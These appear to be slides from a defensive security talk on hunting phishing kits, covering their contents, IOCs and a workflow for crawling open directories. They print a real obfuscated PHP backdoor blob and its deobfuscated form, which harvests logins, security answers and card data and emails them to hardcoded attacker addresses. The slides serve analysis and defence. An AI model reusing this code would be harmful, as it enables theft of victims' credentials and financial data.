Hunting Phish Kits

Josh Rickard

Blue Team
DFIR

Automate all the things

Open Sorcerer

@MSAdministrator

I like long walks through binary trees, #Python & #PowerShell riding, holding hands with Microsoft, writing romantic experiences about code, git prune all the branches, and deep sea #phishing

What is a Phish Kit?

Deployable Web App(s)

A set of tools for attackers to deploy a phishing exploit/attempt.

Title Text

backdooring

eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));

 

Debofuscated Code

$user = $_SESSION['username'];

$pass = $_SESSION['password'];

$q1= $_SESSION['question1'];

$a1 = $_SESSION['answer1'];

$q2 = $_SESSION['question2'];

$a2 = $_SESSION['answer2'];

$q3 = $_SESSION['question3'];

$a3 = $_SESSION['answer3'];

$dob = $_SESSION['dob'];

$exp = $_SESSION['exp'];

$cvv = $_SESSION['cvv'];

 

if (getenv('HTTP_CLIENT_IP')){

$ip=getenv('HTTP_CLIENT_IP');}

else {

$ip=getenv('REMOTE_ADDR');}

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

$browser = $_SERVER['HTTP_USER_AGENT'];

$data = "---------------------bmr---------------------

User: $user

Pass: $pass

-

Q1 : $q1

A1 : $a1

 

Q2 : $q2

A2 : $a2

Q3 : $q3

A3 : $a3

 

dob: $dob

exp: $exp

cvv: $cvv

 

-

Browser: $browser

 IP: $ip

---------------------BMO---------------------

";

 

$un = "multic62@yandex.com";

$do = "sco314159265395.com";

$tr = "fi5319624@gmail.com";

 

 

 

 

 

$subj = "Bmer $user#$pass#";

 if ($_SESSION['username'] != "" ) {

    mail($un,$subj,$data);

    mail($do,$subj,$data);

    mail($tr,$subj,$data);

}

https://media.pitchfork.com/photos/5d66f433ff912900082415fc/2:1/w_790/TeeJay6.png

img/

  • reduce network communications with the original / cloned site
  • increase backwards compatibility
  • And typical confirmation pages for websites require specific images to replicate the users expected experience.

htaccess

  • Blocking entire CIDR blocks or specific IPs
  • Redirecting based on user-agent string used

robots.txt

  • Disallow access to specific directories
  • Sometimes also used to block specific user-agent strings

Title Text

antibots.php

card validation

logs!

Warez Kits

  • Lots of goodies found here

 

  • PowerShell
  • EXEs
  • MSIs
  • DLLs
  • BINs
  • PDFs
  • DOCXs
  • LNKs
  • APKs

BENIES

ioc's are not dead

  • IOC's are still valuable for active defense but TTPs are better for long-term defensive measures

 

  • PhishKit Names & Versions

  • Email Addresses being used to forward captured content

  • Logs

  • Specific hosting providers

    • WHOIS/RDAP info

  • Additionally, if you continue to see a phishkit variant over and over you can track their defensive measures - this also helps to improve your own tooling

catchin kitz

simplified phishing response workflow

simplified phishing response workflow

pre-filtered sources

raw sources

#opendir || opendir

#phishkit || phishkit

#phishingkit ||phishingkit

#opendir

/some[.]domain[.]com/phish/path

some.domain[.com//phish//path

hxxps://some.domain[.]com/phish/path

hXXp://some.domain.com/

http://some.domain.com/

finding & generating paths

  1. Identify the root of the site
  2. Download content
  3. Check if title of page contains "Index Of"
    1. Parse all <a> & <href> tags for files and folders
    2. Add files to file list (add to master list)
    3. Add folders to original URL path (add to master list)
    4. Repeat
  4. Each folder in path (path list) is parsed and a .zip is appended
    1. Add to master list
  5. Attempt to download all files (based on extension preference) in master list
  6. Profit?

Title Text

open-source tools

kthxbye

twitter: @MSAdministrator

github: https://github.com/MSAdministrator

p-blog: https://letsautomate.it

w-blog: https://swimlane.com/blog

 

 

 

 

 

 

trawl: https://github.com/swimlane/trawl

slides: https://letsautomate.it/presentations/hunting-for-phishkits.html#/

                         (slides will be up sometime this week/end)